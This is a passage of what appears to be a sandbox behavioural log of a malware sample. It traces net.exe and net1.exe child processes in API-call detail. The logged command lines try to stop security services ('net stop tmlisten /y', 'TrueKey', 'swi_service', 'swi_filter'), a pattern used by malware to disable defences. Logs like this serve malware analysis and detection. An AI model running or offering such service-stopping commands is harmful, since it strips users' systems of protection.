(_String1="rdr", _String2="SWI_SERVICE") returned -1 [0115.811] _wcsicmp (_String1="workstation", _String2="SWI_SERVICE") returned 4 [0115.811] _wcsicmp (_String1="work", _String2="SWI_SERVICE") returned 4 [0115.811] _wcsicmp (_String1="wksta", _String2="SWI_SERVICE") returned 4 [0115.811] _wcsicmp (_String1="prdr", _String2="SWI_SERVICE") returned -3 [0115.811] _wcsicmp (_String1="devrdr", _String2="SWI_SERVICE") returned -15 [0115.811] _wcsicmp (_String1="lanmanworkstation", _String2="SWI_SERVICE") returned -7 [0115.811] _wcsicmp (_String1="server", _String2="SWI_SERVICE") returned -18 [0115.811] _wcsicmp (_String1="svr", _String2="SWI_SERVICE") returned -1 [0115.811] _wcsicmp (_String1="srv", _String2="SWI_SERVICE") returned -5 [0115.811] _wcsicmp (_String1="lanmanserver", _String2="SWI_SERVICE") returned -7 [0115.811] _wcsicmp (_String1="alerter", _String2="SWI_SERVICE") returned -18 [0115.811] _wcsicmp (_String1="netlogon", _String2="SWI_SERVICE") returned -5 [0115.811] NetServiceControl (in: servername=0x0, service="SWI_SERVICE", opcode=0x0, arg=0x0, bufptr=0x22fbf0 | out: bufptr=0x22fbf0) returned 0x889 [0115.812] wcscpy_s (in: _Destination=0xff3a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0115.812] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0115.813] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3a5b50, nSize=0x800, Arguments=0xff3a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0115.816] GetFileType (hFile=0xb) returned 0x2 [0115.816] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22fab8 | out: lpMode=0x22fab8) returned 1 [0115.816] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x22fab0, lpReserved=0x0 | out: lpBuffer=0xff3a5b50*, lpNumberOfCharsWritten=0x22fab0*=0x1e) returned 1 [0115.817] GetFileType (hFile=0xb) returned 0x2 [0115.817] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22fab8 | out: lpMode=0x22fab8) returned 1 [0115.817] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff381efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22fab0, lpReserved=0x0 | out: lpBuffer=0xff381efc*, lpNumberOfCharsWritten=0x22fab0*=0x2) returned 1 [0115.818] _ultow (in: _Dest=0x889, _Radix=2292512 | out: _Dest=0x889) returned="2185" [0115.818] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3a5b50, nSize=0x800, Arguments=0xff3a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0115.818] GetFileType (hFile=0xb) returned 0x2 [0115.818] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22fab8 | out: lpMode=0x22fab8) returned 1 [0115.818] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x22fab0, lpReserved=0x0 | out: lpBuffer=0xff3a5b50*, lpNumberOfCharsWritten=0x22fab0*=0x34) returned 1 [0115.819] GetFileType (hFile=0xb) returned 0x2 [0115.819] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22fab8 | out: lpMode=0x22fab8) returned 1 [0115.819] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff381efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22fab0, lpReserved=0x0 | out: lpBuffer=0xff381efc*, lpNumberOfCharsWritten=0x22fab0*=0x2) returned 1 [0115.820] NetApiBufferFree (Buffer=0x394d50) returned 0x0 [0115.820] NetApiBufferFree (Buffer=0x39c100) returned 0x0 [0115.820] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_service /y" [0115.820] exit (_Code=2) Process: id = "321" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x698b0000" os_pid = "0x1344" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop tmlisten /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11454 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11455 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11456 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11457 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11458 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11459 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11460 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11461 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11462 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11463 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11464 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 11465 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 838 os_tid = 0x82c Process: id = "322" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x234d0000" os_pid = "0x1e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop TrueKey /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11466 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11467 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 11468 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 11469 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11470 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11471 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11472 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11473 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11474 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11475 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11476 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 11477 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 840 os_tid = 0x964 Process: id = "323" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x510dd000" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "311" os_parent_pid = "0x330" cmd_line = "C:\\Windows\\system32\\net1 stop swi_filter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11478 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11479 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11480 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11481 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 11482 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11483 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11484 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11485 start_va = 0xffdf0000 end_va = 0xffe22fff entry_point = 0xffdf0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11486 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11487 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11488 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 11489 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11502 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11503 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11504 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11505 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11506 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 11507 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 11508 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11509 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11510 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11511 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11512 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11513 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11514 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11515 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11516 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11517 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11518 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11519 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11520 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11521 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11522 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11523 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11524 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11525 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11526 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11527 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11583 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 842 os_tid = 0xb1c [0116.402] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afdb0 | out: lpSystemTimeAsFileTime=0x1afdb0*(dwLowDateTime=0xfa8552b0, dwHighDateTime=0x1d48689)) [0116.402] GetCurrentProcessId () returned 0x828 [0116.402] GetCurrentThreadId () returned 0xb1c [0116.402] GetTickCount () returned 0x26c68 [0116.402] QueryPerformanceCounter (in: lpPerformanceCount=0x1afdb8 | out: lpPerformanceCount=0x1afdb8*=1816332000000) returned 1 [0116.402] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0116.402] __set_app_type (_Type=0x1) [0116.402] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe09c9c) returned 0x0 [0116.402] __getmainargs (in: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788, _DoWildCard=0, _StartInfo=0xffe1479c | out: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788) returned 0 [0116.403] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.403] GetConsoleOutputCP () returned 0x1b5 [0116.454] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe1cec0 | out: lpCPInfo=0xffe1cec0) returned 1 [0116.454] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.456] sprintf_s (in: _DstBuf=0x1afd58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0116.456] setlocale (category=0, locale=".437") returned="English_United States.437" [0116.458] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.458] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0116.458] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_filter /y" [0116.458] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afaf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0116.459] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0116.459] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afd48 | out: Buffer=0x1afd48*=0x374d50) returned 0x0 [0116.459] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afd48 | out: Buffer=0x1afd48*=0x37c0f0) returned 0x0 [0116.459] _fileno (_File=0x7fefdba2a80) returned 0 [0116.459] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0116.459] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0116.459] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0116.459] _wcsicmp (_String1="config", _String2="stop") returned -16 [0116.459] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0116.459] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0116.459] _wcsicmp (_String1="file", _String2="stop") returned -13 [0116.460] _wcsicmp (_String1="files", _String2="stop") returned -13 [0116.460] _wcsicmp (_String1="group", _String2="stop") returned -12 [0116.460] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0116.460] _wcsicmp (_String1="help", _String2="stop") returned -11 [0116.460] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0116.460] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0116.460] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0116.460] _wcsicmp (_String1="session", _String2="stop") returned -15 [0116.460] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0116.460] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0116.460] _wcsicmp (_String1="share", _String2="stop") returned -12 [0116.460] _wcsicmp (_String1="start", _String2="stop") returned -14 [0116.460] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0116.460] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0116.460] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0116.460] _wcsicmp (_String1="accounts", _String2="swi_filter") returned -18 [0116.460] _wcsicmp (_String1="computer", _String2="swi_filter") returned -16 [0116.460] _wcsicmp (_String1="config", _String2="swi_filter") returned -16 [0116.460] _wcsicmp (_String1="continue", _String2="swi_filter") returned -16 [0116.461] _wcsicmp (_String1="cont", _String2="swi_filter") returned -16 [0116.461] _wcsicmp (_String1="file", _String2="swi_filter") returned -13 [0116.461] _wcsicmp (_String1="files", _String2="swi_filter") returned -13 [0116.461] _wcsicmp (_String1="group", _String2="swi_filter") returned -12 [0116.461] _wcsicmp (_String1="groups", _String2="swi_filter") returned -12 [0116.461] _wcsicmp (_String1="help", _String2="swi_filter") returned -11 [0116.461] _wcsicmp (_String1="helpmsg", _String2="swi_filter") returned -11 [0116.461] _wcsicmp (_String1="localgroup", _String2="swi_filter") returned -7 [0116.461] _wcsicmp (_String1="pause", _String2="swi_filter") returned -3 [0116.461] _wcsicmp (_String1="session", _String2="swi_filter") returned -18 [0116.461] _wcsicmp (_String1="sessions", _String2="swi_filter") returned -18 [0116.461] _wcsicmp (_String1="sess", _String2="swi_filter") returned -18 [0116.461] _wcsicmp (_String1="share", _String2="swi_filter") returned -15 [0116.461] _wcsicmp (_String1="start", _String2="swi_filter") returned -3 [0116.461] _wcsicmp (_String1="stats", _String2="swi_filter") returned -3 [0116.461] _wcsicmp (_String1="statistics", _String2="swi_filter") returned -3 [0116.461] _wcsicmp (_String1="stop", _String2="swi_filter") returned -3 [0116.461] _wcsicmp (_String1="time", _String2="swi_filter") returned 1 [0116.461] _wcsicmp (_String1="user", _String2="swi_filter") returned 2 [0116.461] _wcsicmp (_String1="users", _String2="swi_filter") returned 2 [0116.462] _wcsicmp (_String1="msg", _String2="swi_filter") returned -6 [0116.462] _wcsicmp (_String1="messenger", _String2="swi_filter") returned -6 [0116.462] _wcsicmp (_String1="receiver", _String2="swi_filter") returned -1 [0116.462] _wcsicmp (_String1="rcv", _String2="swi_filter") returned -1 [0116.462] _wcsicmp (_String1="netpopup", _String2="swi_filter") returned -5 [0116.462] _wcsicmp (_String1="redirector", _String2="swi_filter") returned -1 [0116.462] _wcsicmp (_String1="redir", _String2="swi_filter") returned -1 [0116.462] _wcsicmp (_String1="rdr", _String2="swi_filter") returned -1 [0116.462] _wcsicmp (_String1="workstation", _String2="swi_filter") returned 4 [0116.462] _wcsicmp (_String1="work", _String2="swi_filter") returned 4 [0116.462] _wcsicmp (_String1="wksta", _String2="swi_filter") returned 4 [0116.462] _wcsicmp (_String1="prdr", _String2="swi_filter") returned -3 [0116.462] _wcsicmp (_String1="devrdr", _String2="swi_filter") returned -15 [0116.462] _wcsicmp (_String1="lanmanworkstation", _String2="swi_filter") returned -7 [0116.462] _wcsicmp (_String1="server", _String2="swi_filter") returned -18 [0116.462] _wcsicmp (_String1="svr", _String2="swi_filter") returned -1 [0116.462] _wcsicmp (_String1="srv", _String2="swi_filter") returned -5 [0116.463] _wcsicmp (_String1="lanmanserver", _String2="swi_filter") returned -7 [0116.463] _wcsicmp (_String1="alerter", _String2="swi_filter") returned -18 [0116.463] _wcsicmp (_String1="netlogon", _String2="swi_filter") returned -5 [0116.463] _wcsupr (in: _String="swi_filter" | out: _String="SWI_FILTER") returned="SWI_FILTER" [0116.463] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x37ce00 [0116.468] GetServiceKeyNameW (in: hSCManager=0x37ce00, lpDisplayName="SWI_FILTER", lpServiceName=0xffe15750, lpcchBuffer=0x1afc68 | out: lpServiceName="", lpcchBuffer=0x1afc68) returned 0 [0116.470] _wcsicmp (_String1="msg", _String2="SWI_FILTER") returned -6 [0116.470] _wcsicmp (_String1="messenger", _String2="SWI_FILTER") returned -6 [0116.470] _wcsicmp (_String1="receiver", _String2="SWI_FILTER") returned -1 [0116.470] _wcsicmp (_String1="rcv", _String2="SWI_FILTER") returned -1 [0116.470] _wcsicmp (_String1="redirector", _String2="SWI_FILTER") returned -1 [0116.470] _wcsicmp (_String1="redir", _String2="SWI_FILTER") returned -1 [0116.470] _wcsicmp (_String1="rdr", _String2="SWI_FILTER") returned -1 [0116.470] _wcsicmp (_String1="workstation", _String2="SWI_FILTER") returned 4 [0116.470] _wcsicmp (_String1="work", _String2="SWI_FILTER") returned 4 [0116.470] _wcsicmp (_String1="wksta", _String2="SWI_FILTER") returned 4 [0116.470] _wcsicmp (_String1="prdr", _String2="SWI_FILTER") returned -3 [0116.470] _wcsicmp (_String1="devrdr", _String2="SWI_FILTER") returned -15 [0116.470] _wcsicmp (_String1="lanmanworkstation", _String2="SWI_FILTER") returned -7 [0116.470] _wcsicmp (_String1="server", _String2="SWI_FILTER") returned -18 [0116.470] _wcsicmp (_String1="svr", _String2="SWI_FILTER") returned -1 [0116.471] _wcsicmp (_String1="srv", _String2="SWI_FILTER") returned -5 [0116.471] _wcsicmp (_String1="lanmanserver", _String2="SWI_FILTER") returned -7 [0116.471] _wcsicmp (_String1="alerter", _String2="SWI_FILTER") returned -18 [0116.471] _wcsicmp (_String1="netlogon", _String2="SWI_FILTER") returned -5 [0116.471] NetServiceControl (in: servername=0x0, service="SWI_FILTER", opcode=0x0, arg=0x0, bufptr=0x1afc70 | out: bufptr=0x1afc70) returned 0x889 [0116.472] wcscpy_s (in: _Destination=0xffe180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0116.472] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0116.473] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0116.474] GetFileType (hFile=0xb) returned 0x2 [0116.475] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afb38 | out: lpMode=0x1afb38) returned 1 [0116.475] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1afb30, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x1afb30*=0x1e) returned 1 [0116.475] GetFileType (hFile=0xb) returned 0x2 [0116.478] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afb38 | out: lpMode=0x1afb38) returned 1 [0116.479] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afb30, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x1afb30*=0x2) returned 1 [0116.479] _ultow (in: _Dest=0x889, _Radix=1768352 | out: _Dest=0x889) returned="2185" [0116.479] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0116.479] GetFileType 